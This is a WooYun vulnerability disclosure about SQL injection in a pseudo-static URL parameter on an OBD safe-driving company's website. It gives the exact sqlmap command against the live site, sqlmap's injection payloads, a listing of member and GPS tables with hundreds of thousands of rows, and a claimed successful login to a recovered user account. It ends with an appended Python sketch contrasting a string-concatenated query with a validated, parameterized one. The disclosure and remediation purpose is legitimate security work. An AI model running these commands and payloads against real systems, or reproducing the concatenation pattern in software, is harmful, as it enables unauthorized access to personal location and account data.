WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader ------------------- http://drop.zone.ci/
2015-10-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly.
2015-11-24: The vendor has actively ignored the vulnerability; details are disclosed to the public.
Chebao (OBD device) safe-driving data company has a vulnerability that leaks member information
http://www.chebao.com.cn:80/index.php/Content/faqList/id/8
SQL injection via a pseudo-static (URL-rewritten) parameter
python sqlmap.py -u "http://www.chebao.com.cn:80/index.php/Content/faqList/id/8*"
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND 7726=7726

    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 UNION ALL SELECT NULL,CONCAT(0x7163756971,0x4a44716272437778614b,0x71646f7571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND 7726=7726

    Type: UNION query
    Title: MySQL UNION query (NULL) - 14 columns
    Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 UNION ALL SELECT NULL,CONCAT(0x7163756971,0x4a44716272437778614b,0x71646f7571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://www.chebao.com.cn:80/index.php/Content/faqList/id/8 AND SLEEP(5)
---
back-end DBMS: MySQL 5.0.11
available databases [5]:
[*] cbubi
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
The user count is considerable as well.
back-end DBMS: MySQL 5.0.11
Database: cbubi
+------------------------------------+---------+
| Table                              | Entries |
+------------------------------------+---------+
| tal_daydetail_xn                   | 1330960 |
| cb_user                            | 802958  |
| cb_user_bk_0831                    | 801500  |
| cb_jsz                             | 788153  |
| obd_drive                          | 654573  |
| tal_oil_detail_info                | 581431  |
| tal_oil_detail_info_0908           | 491600  |
| tal_income_logs                    | 328831  |
| obd_gps_data_20150601              | 315904  |
| obd_gps_data_20150530              | 314009  |
| obd_gps_data_20150531              | 301170  |
| obd_gps_data_20150529              | 280027  |
| obd_gps_data_20150926              | 244207  |
| tal_daydetail                      | 228955  |
| obd_gps_data_20150602              | 221998  |
| obd_gps_data_20150904              | 200947  |
| obd_gps_data_ljs_20150527          | 200118  |
| obd_gps_data_ljs_20150520          | 198860  |
| obd_gps_data_20150925              | 198269  |
Random test of a recovered account: login successful.
Fix: filter the input.
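As an added example (not code from the original report or from the vendor), the pseudo-static `id` segment of `/index.php/Content/faqList/id/8` handled the vulnerable way beside the filtered, parameterized way. The application's real code is PHP and is not on the page, so this Python sketch stands in for it with a constructed in-memory SQLite table and a ThinkPHP-style route parser (both assumptions), fed the boolean-based payload from the sqlmap output above.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the FAQ table; the real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE faq (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO faq VALUES (?, ?)",
                   [(7, "faq seven"), (8, "faq eight"), (9, "faq nine")])
    return db


def route_param(path_info, name):
    """Read a key/value pair from a pseudo-static PATH_INFO such as
    '/Content/faqList/id/8' -> '8'. Assumed ThinkPHP-style layout:
    /Controller/action/key1/value1/key2/value2..."""
    parts = path_info.strip("/").split("/")
    for i in range(2, len(parts) - 1, 2):
        if parts[i] == name:
            return parts[i + 1]
    return None


def faq_list_vulnerable(db, path_info):
    # Vulnerable pattern: the URL segment is spliced into the SQL text, so
    # '8 AND 7726=7726' (true) and '8 AND 7726=7727' (false) return different
    # result sets. That difference is the boolean-based blind oracle sqlmap found.
    raw = route_param(path_info, "id")
    return db.execute("SELECT id, title FROM faq WHERE id=" + raw).fetchall()


def faq_list_hardened(db, path_info):
    # Filter first: the id must be a short, purely numeric token.
    raw = route_param(path_info, "id")
    if raw is None or not re.fullmatch(r"[0-9]{1,10}", raw):
        raise ValueError("invalid id")
    # Then bind it; even a validated value never becomes part of the SQL text.
    return db.execute("SELECT id, title FROM faq WHERE id=?", (int(raw),)).fetchall()


def is_rejected(db, path_info):
    """True when the hardened handler refuses the request."""
    try:
        faq_list_hardened(db, path_info)
        return False
    except ValueError:
        return True
```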
Unable to contact the vendor, or the vendor actively declined.
Vulnerability Rank: 15 (WooYun rating)